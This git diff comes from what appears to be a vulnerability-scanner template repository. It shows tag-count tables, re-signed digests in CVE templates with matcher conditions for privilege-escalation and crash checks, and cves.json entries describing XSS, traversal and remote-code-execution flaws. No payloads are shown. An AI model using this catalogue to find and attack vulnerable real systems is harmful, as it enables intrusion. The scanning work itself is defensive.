| | | | | | | | +| ellucian | 1 | | | | | | | | | +| sympa | 1 | | | | | | | | | +| gianni_tommasi | 1 | | | | | | | | | +| new-year-firework_project | 1 | | | | | | | | | +| kingdee | 1 | | | | | | | | | +| authelia | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| ibm-decision-runner | 1 | | | | | | | | | +| sshpass | 1 | | | | | | | | | +| cloudfoundry | 1 | | | | | | | | | +| silverback | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| eyoumail | 1 | | | | | | | | | +| commvault | 1 | | | | | | | | | +| osghs | 1 | | | | | | | | | +| enrollment | 1 | | | | | | | | | +| smartzone | 1 | | | | | | | | | +| endress | 1 | | | | | | | | | +| contactossex | 1 | | | | | | | | | +| privx | 1 | | | | | | | | | +| kuma | 1 | | | | | | | | | +| norton | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| photoblocks-gallery | 1 | | | | | | | | | +| opennebula | 1 | | | | | | | | | +| introspection | 1 | | | | | | | | | +| fox | 1 | | | | | | | | | +| knowledgetree | 1 | | | | | | | | | +| vfbpro | 1 | | | | | | | | | +| prismatic | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| naija-planet | 1 | | | | | | | | | +| babel | 1 | | | | | | | | | +| musictraveler | 1 | | | | | | | | | +| nextgen | 1 | | | | | | | | | +| canal | 1 | | | | | | | | | +| pcloud | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| amtythumb_project | 1 | | | | | | | | | +| secure-donation | 1 | | | | | | | | | +| topapplb | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| skeb | 1 | | | | | | | | | +| planet | 1 | | | | | | | | | +| commerce | 1 | | | | | | | | | +| cgit | 1 | | | | | | | | | +| 'updraftplus' | 1 | | | | | | | | | +| hackenproof | 1 | | | | | | | | | +| target | 1 | | | | | | | | | +| ifeelweb | 1 | | | | | | | | | +| screenshotapi | 1 | | | | | | | | | +| ozeki | 1 | | | | | | | | | +| ksoa | 1 | | | | | | | | | +| speakout\!_email_petitions_project | 1 | | | | | | | | | +| m0r0n | 1 | | | | | | | | | +| inglorion | 1 | | | | | | | | | +| mediation | 1 | | | | | | | | | +| allmylinks | 1 | | | | | | | | | +| mastodononline | 1 | | | | | | | | | +| titan-framework | 1 | | | | | | | | | +| thoughtworks | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| onlinefarm | 1 | | | | | | | | | +| dmarc | 1 | | | | | | | | | +| revive-sas | 1 | | | | | | | | | +| medyczkapl | 1 | | | | | | | | | +| avid-community | 1 | | | | | | | | | +| cloudrun | 1 | | | | | | | | | +| monday | 1 | | | | | | | | | +| stackposts | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| alliedtelesis | 1 | | | | | | | | | +| fooplugins | 1 | | | | | | | | | +| movies_project | 1 | | | | | | | | | +| divido | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| html2wp | 1 | | | | | | | | | +| myblog | 1 | | | | | | | | | +| wattpad | 1 | | | | | | | | | +| polygon | 1 | | | | | | | | | +| farkascity | 1 | | | | | | | | | +| jivesoftware | 1 | | | | | | | | | +| foss | 1 | | | | | | | | | +| kopano | 1 | | | | | | | | | +| sphinxsearch | 1 | | | | | | | | | +| broker | 1 | | | | | | | | | +| heylink | 1 | | | | | | | | | +| spring-boot-actuator-logview_project | 1 | | | | | | | | | +| vibe | 1 | | | | | | | | | +| system | 1 | | | | | | | | | +| audiobookshelf | 1 | | | | | | | | | +| axyom | 1 | | | | | | | | | +| deliveroo | 1 | | | | | | | | | +| parler-archived-posts | 1 | | | | | | | | | +| hack5c2 | 1 | | | | | | | | | +| wp-video-gallery-free_project | 1 | | | | | | | | | +| altn | 1 | | | | | | | | | +| activeadmin | 1 | | | | | | | | | +| moduweb | 1 | | | | | | | | | +| codementor | 1 | | | | | | | | | +| magabook | 1 | | | | | | | | | +| mastodon-mstdnio | 1 | | | | | | | | | +| chefio | 1 | | | | | | | | | +| tvt | 1 | | | | | | | | | +| redux | 1 | | | | | | | | | +| webtools | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| tracker | 1 | | | | | | | | | +| batflat | 1 | | | | | | | | | +| openvz | 1 | | | | | | | | | +| viddler | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| timely | 1 | | | | | | | | | +| groomify | 1 | | | | | | | | | +| kik | 1 | | | | | | | | | +| joombri | 1 | | | | | | | | | +| fark | 1 | | | | | | | | | +| passbolt | 1 | | | | | | | | | +| metacritic | 1 | | | | | | | | | +| simplerealtytheme | 1 | | | | | | | | | +| raygun | 1 | | | | | | | | | +| kramerav | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| friendweb | 1 | | | | | | | | | +| gnpublisher | 1 | | | | | | | | | +| svg | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| intouch | 1 | | | | | | | | | +| zaver | 1 | | | | | | | | | +| portrait-archiv-shop | 1 | | | | | | | | | +| photoxhibit_project | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| teamviewer | 1 | | | | | | | | | +| iptv | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| refsheet | 1 | | | | | | | | | +| clusterdafrica | 1 | | | | | | | | | +| airline-pilot-life | 1 | | | | | | | | | +| hackaday | 1 | | | | | | | | | +| ltrace | 1 | | | | | | | | | +| forescout | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| sp-client-document-manager | 1 | | | | | | | | | +| woody | 1 | | | | | | | | | +| clubhouse | 1 | | | | | | | | | +| picsart | 1 | | | | | | | | | +| slides | 1 | | | | | | | | | +| webtoprint | 1 | | | | | | | | | +| wpquery | 1 | | | | | | | | | +| run-parts | 1 | | | | | | | | | +| mtheme | 1 | | | | | | | | | +| nsicg | 1 | | | | | | | | | +| web-access | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| konga_project | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| micro-user-service | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| vironeer | 1 | | | | | | | | | +| tradingview | 1 | | | | | | | | | +| ellipsis-human-presence-technology | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| reqlogic | 1 | | | | | | | | | +| xproxy | 1 | | | | | | | | | +| caringbridge | 1 | | | | | | | | | +| miniorange | 1 | | | | | | | | | +| patch | 1 | | | | | | | | | +| prestashop-module | 1 | | | | | | | | | +| grandprof | 1 | | | | | | | | | +| tarantella | 1 | | | | | | | | | +| ciphertrust | 1 | | | | | | | | | +| twisted | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| omni | 1 | | | | | | | | | +| mgt-commerce | 1 | | | | | | | | | +| amdoren | 1 | | | | | | | | | +| mylittlebackup | 1 | | | | | | | | | +| h5sconsole | 1 | | | | | | | | | +| totalwar | 1 | | | | | | | | | +| shadowpad | 1 | | | | | | | | | +| tracking | 1 | | | | | | | | | +| kakao | 1 | | | | | | | | | +| rest | 1 | | | | | | | | | +| huiwen | 1 | | | | | | | | | +| fusion | 1 | | | | | | | | | +| vr_calendar_project | 1 | | | | | | | | | +| dsr250 | 1 | | | | | | | | | +| simple-urls | 1 | | | | | | | | | +| ko-fi | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| softlimit | 1 | | | | | | | | | +| ru-123rf | 1 | | | | | | | | | +| kernel | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| sanhui-smg | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| dailymotion | 1 | | | | | | | | | +| satellite | 1 | | | | | | | | | +| utility | 1 | | | | | | | | | +| sni | 1 | | | | | | | | | +| owly | 1 | | | | | | | | | +| dynamic | 1 | | | | | | | | | +| dogtag | 1 | | | | | | | | | +| sandhillsdev | 1 | | | | | | | | | +| bitcoinaverage | 1 | | | | | | | | | +| miniwork | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| element | 1 | | | | | | | | | +| medium | 1 | | | | | | | | | +| grc | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| contentify | 1 | | | | | | | | | +| tmdb | 1 | | | | | | | | | +| ab-map | 1 | | | | | | | | | +| bws-social-login | 1 | | | | | | | | | +| social-msdn | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| overseerr | 1 | | | | | | | | | +| cookie | 1 | | | | | | | | | +| wp-helper-lite | 1 | | | | | | | | | +| rustici | 1 | | | | | | | | | +| libvirt | 1 | | | | | | | | | +| federatedpress-mastodon-instance | 1 | | | | | | | | | +| jsonbin | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| arkextensions | 1 | | | | | | | | | +| path | 1 | | | | | | | | | +| viper | 1 | | | | | | | | | +| wechat | 1 | | | | | | | | | +| codepen | 1 | | | | | | | | | +| youphptube | 1 | | | | | | | | | +| plusnet | 1 | | | | | | | | | +| flyteconsole | 1 | | | | | | | | | +| gogits | 1 | | | | | | | | | +| media-library-assistant | 1 | | | | | | | | | +| cults3d | 1 | | | | | | | | | +| linuxorgru | 1 | | | | | | | | | +| msmq | 1 | | | | | | | | | +| supersign | 1 | | | | | | | | | +| finance | 1 | | | | | | | | | +| hubski | 1 | | | | | | | | | +| geth | 1 | | | | | | | | | +| nootheme | 1 | | | | | | | | | +| devrant | 1 | | | | | | | | | +| wprssaggregator | 1 | | | | | | | | | +| wpsolr | 1 | | | | | | | | | +| mailwatch | 1 | | | | | | | | | +| cse_bookstore_project | 1 | | | | | | | | | +| mastodon-api | 1 | | | | | | | | | +| decryptweb | 1 | | | | | | | | | +| shardingsphere | 1 | | | | | | | | | +| chaos | 1 | | | | | | | | | +| com_janews | 1 | | | | | | | | | +| api_bearer_auth_project | 1 | | | | | | | | | +| raspberrymatic | 1 | | | | | | | | | +| obcs | 1 | | | | | | | | | +| wintercms | 1 | | | | | | | | | +| defectdojo | 1 | | | | | | | | | +| register | 1 | | | | | | | | | +| multitime | 1 | | | | | | | | | +| tiempocom | 1 | | | | | | | | | +| icc-pro | 1 | | | | | | | | | +| nsq | 1 | | | | | | | | | +| vistaweb | 1 | | | | | | | | | +| zencart | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| cobbler_project | 1 | | | | | | | | | +| opms | 1 | | | | | | | | | +| fractalia | 1 | | | | | | | | | +| intel | 1 | | | | | | | | | +| tailon | 1 | | | | | | | | | +| guard | 1 | | | | | | | | | +| enscript | 1 | | | | | | | | | +| ransomware | 1 | | | | | | | | | +| revmakx | 1 | | | | | | | | | +| johnsoncontrols | 1 | | | | | | | | | +| wp_content_source_control_project | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| sahipro | 1 | | | | | | | | | +| account-takeover | 1 | | | | | | | | | +| iclock | 1 | | | | | | | | | +| publickey | 1 | | | | | | | | | +| fortnite-tracker | 1 | | | | | | | | | +| mikejolley | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| label-studio | 1 | | | | | | | | | +| aliexpress | 1 | | | | | | | | | +| cowboys4angels | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| moneysavingexpert | 1 | | | | | | | | | +| login-bypass | 1 | | | | | | | | | +| enterprise | 1 | | | | | | | | | +| pinata | 1 | | | | | | | | | +| bws-pinterest | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| teslamate | 1 | | | | | | | | | +| faktopedia | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| soloby | 1 | | | | | | | | | +| isg | 1 | | | | | | | | | +| cargocollective | 1 | | | | | | | | | +| switching | 1 | | | | | | | | | +| crystal | 1 | | | | | | | | | +| onyphe | 1 | | | | | | | | | +| edx | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| vr-calendar-sync | 1 | | | | | | | | | +| easy-student-results | 1 | | | | | | | | | +| college_management_system_project | 1 | | | | | | | | | +| hiring | 1 | | | | | | | | | +| datingru | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| clearfy-cache | 1 | | | | | | | | | +| parse | 1 | | | | | | | | | +| querysol | 1 | | | | | | | | | +| martech | 1 | | | | | | | | | +| mymfans | 1 | | | | | | | | | +| plurk | 1 | | | | | | | | | +| rejetto | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| simple-file-list | 1 | | | | | | | | | +| proxycrawl | 1 | | | | | | | | | +| okidoki | 1 | | | | | | | | | +| snapdrop | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| woo-order-export-lite | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| johnniejodelljr | 1 | | | | | | | | | +| celery | 1 | | | | | | | | | +| nihbuatjajan | 1 | | | | | | | | | +| alcatel | 1 | | | | | | | | | +| bws-htaccess | 1 | | | | | | | | | +| acymailing | 1 | | | | | | | | | +| qantumthemes | 1 | | | | | | | | | +| fortiauthenticator | 1 | | | | | | | | | +| juddi | 1 | | | | | | | | | +| privatekey | 1 | | | | | | | | | +| orcusrat | 1 | | | | | | | | | +| dionesoft | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| wptaskforce | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| whatsapp | 1 | | | | | | | | | +| bdsmlr | 1 | | | | | | | | | +| coroflot | 1 | | | | | | | | | +| nethermind | 1 | | | | | | | | | +| xargs | 1 | | | | | | | | | +| 3dnews | 1 | | | | | | | | | +| httpbrowser | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| sicom | 1 | | | | | | | | | +| header-footer-code-manager | 1 | | | | | | | | | +| opengraphr | 1 | | | | | | | | | +| atechmedia | 1 | | | | | | | | | +| dir-615 | 1 | | | | | | | | | +| fcv | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| bws-realty | 1 | | | | | | | | | +| fortiddos | 1 | | | | | | | | | +| garagemanagementsystem | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| notolytix | 1 | | | | | | | | | +| obr | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| treeview | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| airnotifier | 1 | | | | | | | | | +| sugar | 1 | | | | | | | | | +| thegatewaypundit | 1 | | | | | | | | | +| mws | 1 | | | | | | | | | +| powercommanager | 1 | | | | | | | | | +| scrapingant | 1 | | | | | | | | | +| eventon | 1 | | | | | | | | | +| intigriti | 1 | | | | | | | | | +| interpals | 1 | | | | | | | | | +| mycloud | 1 | | | | | | | | | +| terraboard | 1 | | | | | | | | | +| friendfinder | 1 | | | | | | | | | +| 247sports | 1 | | | | | | | | | +| dfgames | 1 | | | | | | | | | +| readtomyshoe_project | 1 | | | | | | | | | +| home-assistant | 1 | | | | | | | | | +| aa-exec | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| dirk_bartley | 1 | | | | | | | | | +| ultimate-weather_project | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| getperfectsurvey | 1 | | | | | | | | | +| dragonfly_project | 1 | | | | | | | | | +| misp | 1 | | | | | | | | | +| uid | 1 | | | | | | | | | +| recly | 1 | | | | | | | | | +| royal-mail | 1 | | | | | | | | | +| anti-plagiarism_project | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| editor | 1 | | | | | | | | | +| stridercd | 1 | | | | | | | | | +| jobs | 1 | | | | | | | | | +| bqe | 1 | | | | | | | | | +| osclass | 1 | | | | | | | | | +| ijoomla | 1 | | | | | | | | | +| if_surfalert_project | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| emlog | 1 | | | | | | | | | +| aajoda | 1 | | | | | | | | | +| alloannonces | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| hgignore | 1 | | | | | | | | | +| bueltge | 1 | | | | | | | | | +| cdi | 1 | | | | | | | | | +| fe | 1 | | | | | | | | | +| ogugg | 1 | | | | | | | | | +| salon24 | 1 | | | | | | | | | +| management | 1 | | | | | | | | | +| payeezy | 1 | | | | | | | | | +| posthog | 1 | | | | | | | | | +| phpdebug | 1 | | | | | | | | | +| soup | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e596a1e302..b51547729d 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2388 | dhiyaneshdk | 1189 | http | 7229 | info | 3544 | file | 312 | -| panel | 1093 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 | -| wordpress | 954 | dwisiswant0 | 802 | workflows | 191 | medium | 1464 | | | -| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 960 | | | -| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | | -| wp-plugin | 829 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | | -| osint | 791 | pdteam | 285 | javascript | 26 | | | | | -| tech | 661 | ricardomaia | 231 | dns | 18 | | | | | -| lfi | 634 | geeknik | 227 | headless | 11 | | | | | +| cve | 2396 | dhiyaneshdk | 1233 | http | 7267 | info | 3605 | file | 337 | +| panel | 1105 | daffainfo | 864 | file | 337 | high | 1601 | dns | 24 | +| wordpress | 958 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | | +| exposure | 894 | pikpikcu | 353 | network | 133 | critical | 967 | | | +| xss | 893 | pussycat0x | 328 | code | 80 | low | 257 | | | +| wp-plugin | 833 | ritikchaddha | 313 | javascript | 42 | unknown | 35 | | | +| osint | 799 | pdteam | 285 | ssl | 28 | | | | | +| tech | 667 | ricardomaia | 232 | dns | 21 | | | | | +| lfi | 640 | geeknik | 227 | headless | 11 | | | | | | edb | 598 | theamanrawat | 221 | cloud | 9 | | | | | diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index 2264514cb6..30b7130474 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -47,4 +47,4 @@ code: - '!contains(code_1_response, "root")' - 'contains(code_2_response, "root")' condition: and -# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e166f9afc32a9e3f2aa20cf10f4dc7c4ccc6d9ecfb25279db42ee4884fd9a09022100e24c0145e3cb670939ecba31b847513224c52277827290d7358cd3b5e8531825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index e5765959b0..b92022c2ba 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -40,4 +40,4 @@ code: - "malloc(): memory corruption" - "Aborted (core dumped)" condition: and -# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204de6d29ee97c296f1046225fd664237cb80c163370f316bfa2c0174718fa0654022100cbd49f46b75314934af75dde946dbe4a3d135d87368f2dead3b9b2fa40bb839b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 31f4a41452..26688faba5 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -54,4 +54,4 @@ code: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and -# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 46321a88df..4c28f685ab 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -86,4 +86,4 @@ http: - type: dsl dsl: - '"Username => "+ username' -# digest: 4a0a00473045022100c83052cd67b0ace0260a06981566dedfe5355e346d73cc08201817df5a072c590220350dc5ce635ba42dd9a62eed7a671edfc4f9601a8ce02ff5f5e6bcfc6e63f4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index b078a391c6..e7a19e0257 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -39,4 +39,4 @@ code: - type: word words: - "127" # Segmentation Fault Exit Code -# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e884ed16aed759a6b31c001e50ee4aed4db45f060d3335e1b6f28935eae4135022051929119a0bf2eac944500d98af2720a6ff835dcb875f35cc6390fbdf47c8bda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cves.json b/cves.json index bef7f939af..6959fa0181 100644 --- a/cves.json +++ b/cves.json @@ -165,7 +165,7 @@ {"ID":"CVE-2011-4336","Info":{"Name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","Severity":"medium","Description":"Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET \"ajax\" parameter to snarf_ajax.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2011/CVE-2011-4336.yaml"} {"ID":"CVE-2011-4618","Info":{"Name":"Advanced Text Widget \u003c 2.0.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4618.yaml"} {"ID":"CVE-2011-4624","Info":{"Name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4624.yaml"} -{"ID":"CVE-2011-4640","Info":{"Name":"WebTitan \u003c 3.60 - Local File Inclusion","Severity":"medium","Description":"Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\n","Classification":{"CVSSScore":"4.0"}},"file_path":"http/cves/2011/CVE-2011-4640.yaml"} +{"ID":"CVE-2011-4640","Info":{"Name":"WebTitan \u003c 3.60 - Local File Inclusion","Severity":"medium","Description":"Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.\n","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2011/CVE-2011-4640.yaml"} {"ID":"CVE-2011-4804","Info":{"Name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2011/CVE-2011-4804.yaml"} {"ID":"CVE-2011-4926","Info":{"Name":"Adminimize 1.7.22 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-4926.yaml"} {"ID":"CVE-2011-5106","Info":{"Name":"WordPress Plugin Flexible Custom Post Type \u003c 0.1.7 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5106.yaml"} @@ -265,7 +265,7 @@ {"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"} {"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"} {"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"} -{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"} +{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"} {"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"} {"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"} {"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"} @@ -361,6 +361,7 @@ {"ID":"CVE-2016-4975","Info":{"Name":"Apache mod_userdir CRLF injection","Severity":"medium","Description":"Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-4975.yaml"} {"ID":"CVE-2016-4977","Info":{"Name":"Spring Security OAuth2 Remote Command Execution","Severity":"high","Description":"Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-4977.yaml"} {"ID":"CVE-2016-5649","Info":{"Name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","Severity":"critical","Description":"NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 